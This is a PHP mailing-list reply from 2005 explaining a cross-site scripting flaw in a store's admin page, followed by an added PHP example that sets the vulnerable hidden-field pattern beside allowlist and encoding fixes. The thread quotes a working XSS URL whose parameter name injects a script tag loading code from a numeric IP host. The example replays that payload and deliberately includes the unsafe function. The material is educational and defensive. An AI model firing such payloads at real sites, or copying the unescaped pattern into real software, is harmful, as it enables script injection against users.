Chris W. Parker wrote:
> Rasmus Lerdorf <mailto:[EMAIL PROTECTED]>
>     on Friday, May 27, 2005 11:58 AM said:
> 
>> You have all sorts of problems at that URL.  To start with, here is
>> a cross-site scripting hack:
>> 
>> http://www.vlaamse-kern.com/yourstore-0.0.2-beta1/admin/?%22%3E%3Cscript%09src%3D%22http://3423329163/v
> 
> First of all, excellent example.
> 
>> Don't display arbitrary key names in hidden fields the way you are.
> 
> What do you mean by "arbitrary key names"?

He was apparently doing something along the lines of:

  // every incoming query arg, the name as well as the value, is
  // interpolated into the attribute text unescaped
  foreach($_GET as $key=>$val) {
    echo <<<EOL
<input type="hidden" name="$key" value="$val">
EOL;
  }

Probably just a laziness thing.  Generally you will want to keep track
of which query args are actually valid and not just parrot whatever you
get back to the user.  Or if you are going to do it this way,
recognize that you have to filter/encode both the query arg names and
the values.

-Rasmus

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
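The pattern Rasmus describes, with the two fixes he names beside it, as an added example written for this page rather than code from the thread or from the site under discussion. It feeds the exact query string quoted above through PHP's own query parsing (parse_str, standing in for how $_GET is populated), emits hidden fields the unsafe way, then with an allowlist of expected args plus attribute encoding, then with encoding alone. The field names product/qty/page, the function names and the containsForeignTag check are assumptions made for the example. Note why the payload uses %09 (a tab) rather than a space: PHP rewrites spaces and dots in incoming parameter names to underscores, so "script src" would have reached the page as "script_src".

```php
<?php
// Added example for this thread, not code from the original post or from the
// site under discussion. Reproduces the "parrot every query arg into a hidden
// field" pattern and places the two fixes beside it: an allowlist of the args
// the page actually expects, and HTML-attribute encoding of key and value.
// The field names product/qty/page and all function names are assumptions.

// Constructed input: the query string quoted in the thread plus two ordinary
// args, decoded into an array the way PHP fills $_GET. The payload is the
// *key*; its value is empty. %09 is a tab, not a space: PHP rewrites spaces
// and dots in parameter names to "_", which would have broken "script src".
$query = '%22%3E%3Cscript%09src%3D%22http://3423329163/v&product=42&qty=1';
parse_str($query, $args);          // stand-in for $_GET

// 1. The vulnerable pattern: every key and value lands in the attribute raw.
function hiddenFieldsUnsafe(array $args): string
{
    $html = '';
    foreach ($args as $key => $val) {
        $html .= "<input type=\"hidden\" name=\"$key\" value=\"$val\">\n";
    }
    return $html;
}

// One attribute value, safe between double quotes. ENT_QUOTES encodes both
// quote characters, so neither " nor ' can close the attribute early; < and >
// are encoded too, so no tag can be opened from inside it.
function attr(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES, 'UTF-8');
}

// 2. Allowlist + encode: only args this page expects are carried forward,
//    and even those are encoded (a known key can still carry a hostile value).
const FORWARDED_ARGS = ['product', 'qty', 'page'];

function hiddenFieldsAllowlisted(array $args): string
{
    $html = '';
    foreach (FORWARDED_ARGS as $key) {
        if (!isset($args[$key]) || !is_string($args[$key])) {
            continue;               // absent, or an array such as qty[]=1: skip
        }
        $html .= '<input type="hidden" name="' . attr($key)
               . '" value="' . attr($args[$key]) . "\">\n";
    }
    return $html;
}

// 3. Encode-only: if the arg set really must be open-ended, encoding the key
//    as well as the value closes the injection, but unknown args still get
//    forwarded to whatever handles the form.
function hiddenFieldsEncoded(array $args): string
{
    $html = '';
    foreach ($args as $key => $val) {
        if (!is_string($val)) {
            continue;               // a nested array cannot be one attribute
        }
        $html .= '<input type="hidden" name="' . attr((string) $key)
               . '" value="' . attr($val) . "\">\n";
    }
    return $html;
}

// Check usable in a test: does the markup contain any tag other than the
// <input> we meant to emit?
function containsForeignTag(string $html): bool
{
    return (bool) preg_match('/<(?!input\b)[a-z]/i', $html);
}

echo "--- unsafe ---\n", hiddenFieldsUnsafe($args);
echo "--- allowlisted ---\n", hiddenFieldsAllowlisted($args);
echo "--- encoded only ---\n", hiddenFieldsEncoded($args);

foreach (['hiddenFieldsUnsafe', 'hiddenFieldsAllowlisted', 'hiddenFieldsEncoded'] as $fn) {
    printf("%-24s foreign tag: %s\n", $fn, containsForeignTag($fn($args)) ? 'YES' : 'no');
}
```

Run it with `php example.php`. The unsafe variant prints a field whose name attribute is closed by the payload's `">` and followed by a live `<script src="http://3423329163/v" ...>` tag; the allowlisted variant emits only product and qty; the encode-only variant emits the payload as a harmless `&quot;&gt;&lt;script...` name. The allowlist is the fix to prefer: encoding stops the markup injection, but only tracking which args are valid stops an attacker's arguments from being carried into the next request at all.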
